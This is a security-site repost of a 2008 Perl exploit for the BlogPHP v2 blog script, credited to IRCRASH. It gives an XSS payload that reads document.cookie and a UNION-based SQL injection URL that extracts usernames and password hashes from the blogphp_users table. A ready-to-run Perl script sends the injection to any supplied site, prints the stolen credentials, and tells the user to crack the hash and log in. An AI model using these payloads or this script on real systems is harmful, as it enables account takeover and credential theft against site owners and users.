首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 BlogPHP v.2 (id) XSS / Remote SQL Injection Exploit 来源：IRCRASH.COM 作者：Dr.Crash 发布时间：2008-02-03   #!/usr/bin/perl ##################################################################################### ####                                 BlogPHP V.2                                 #### ####             Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS)     #### ##################################################################################### #                                                                                   # #AUTHOR : IRCRASH                                                                   # #Discovered by : Dr.Crash                                                           # #Exploited By : Dr.Crash                                                            # #IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm                               # #                                                                                   # ##################################################################################### #                                                                                   # #Script Download : http://puzzle.dl.sourceforge.net/sourceforge/blogphpscript/BlogPHPv2.zip #                                                                                   # ##################################################################################### #                                   < XSS >                                         # #XSS Address : http://Sitename/index.php?search=<script>alert(document.cookie);</script> #                                                                                   # ##################################################################################### #                                   < SQL >                                         # #SQL Address : http://Sitename/index.php?act=page&id=999999999%27union/**/select/**/0,1,CoNcAt(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),3,4/**/from/**/blogphp_users/* #                                                                                   # ##################################################################################### #                         Our site : Http://IRCRASH.COM                             # ##################################################################################### use LWP; use HTTP::Request; use Getopt::Long; sub header { print " **************************************************** *        SBlogPHP v.2 Sql Injection exploit        * **************************************************** *AUTHOR : IRCRASH                                  * *Discovered by : Dr.Crash                          * *Exploited by : Dr.Crash                           * *Our Site : IRCRASH.COM                            * ****************************************************"; } sub usage {   print " * Usage : perl $0 -url http://Sitename/ **************************************************** "; }                                                                                  my %parameter = (); GetOptions(\%parameter, "url=s"); $url = $parameter{"url"}; if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url."/";} if($url !~ /http:\/\//){$url = "http://".$url;} $vul = "/index.php?act=page&id=999999999%27union/**/select/**/0,1,CoNcAt(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),3,4/**/from/**/blogphp_users/*"; sub Exploit() { $requestpage = $url.$vul; print "Requesting Page is ".$url."\n"; my $req  = HTTP::Request->new("POST",$requestpage); $ua = LWP::UserAgent->new; $ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req->referer($url); $req->referer("http://IRCRASH.COM"); $req->content_type('application/x-www-form-urlencoded'); $req->header("content-length" => $contlen); $req->content($poststring); $response = $ua->request($req); $content = $response->content; $header = $response->headers_as_string(); #Debug Modus delete # at beginning of next line #print $content; @name = split(/Login:/,$content); $name = @name[1]; @name = split(/<enduser>/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/<endpass>/,$password); $password = @password[0]; if(!$name && !$password) { print "\n\n"; print "!Exploit failed ! :(\n\n"; exit; } print "Username: ".$name."\n"; print "Password: " .$password."\n\n"; print "Crack Md5 Password And Login In : $url/login.html\n"; print "Enjoy My friend .....\n"; } #Starting; print " **************************************************** *        SBlogPHP v.2 Sql Injection exploit        * **************************************************** *AUTHOR : IRCRASH                                  * *Discovered by : Dr.Crash                          * *Exploited by : Dr.Crash                           * *Our Site : IRCRASH.COM                            * ****************************************************"; print "\n\nExploiting...\n"; Exploit();   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Titan FTP Server 6.03 (USER/PA ·Yahoo! Music Jukebox 2.2 AddIm ·Total Video Player 1.03 M3U Fi ·MySpace Uploader (MySpaceUploa ·IpSwitch WS_FTP Server with SS ·ibProArcade <= 3.3.0 Remote SQ ·Sejoong Namo ActiveSquare 6 Na ·Wordpress Plugin WassUp 1.4.3 ·Yahoo! Music Jukebox 2.2 AddIm ·Wordpress Plugin Adserve 0.2 a ·Yahoo! Music Jukebox 2.2 AddIm ·Connectix Boards <= 0.8.2 temp   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved